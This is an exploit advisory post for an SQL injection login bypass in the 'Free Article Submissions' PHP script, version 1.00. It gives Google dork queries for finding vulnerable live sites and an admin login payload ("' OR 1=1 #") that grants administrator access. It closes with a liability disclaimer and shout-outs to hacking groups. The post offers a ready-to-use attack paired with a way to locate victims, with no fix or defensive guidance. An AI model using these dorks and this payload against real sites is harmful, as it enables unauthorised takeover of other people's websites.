# Exploit Title: Free Article Submissions SQL Injection Vulnerability# Google Dork: inurl:/category.php?id=22 "Affiliate Programs Portal"
inurl:/category.php?id=2"Arts & Entertainment"# Date: 07/12/2014# Exploit Author: BarrabravaZ# Vendor Homepage: http://www.articlesetup.com/# Software Link: [download link if available]# Version: 1.00# Tested on: Windows
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
«««:»»»Author will be not responsible forany damage.«««:»»»
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
x
x Issue:
x SQL Injection Bypass Login
x
x Risk level: High
x ~ The remote attacker has the possibility to manage the website.
x ~ The remote attacker is able to login into website with access level as admin.
x
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
#### Proof Of Concept:## http://127.0.0.1/admin/login.php#### Username :' OR 1=1 ### Password :barrabravaz####
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Special thanks to:[+] Chae Cryptn [+] Slackerc0de Family [+] SBH Pentester [+] Pocong XXX
[+] Madleets [+] Xplorecrew [+] Hackernewbie [+] Yogyacarderlink
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
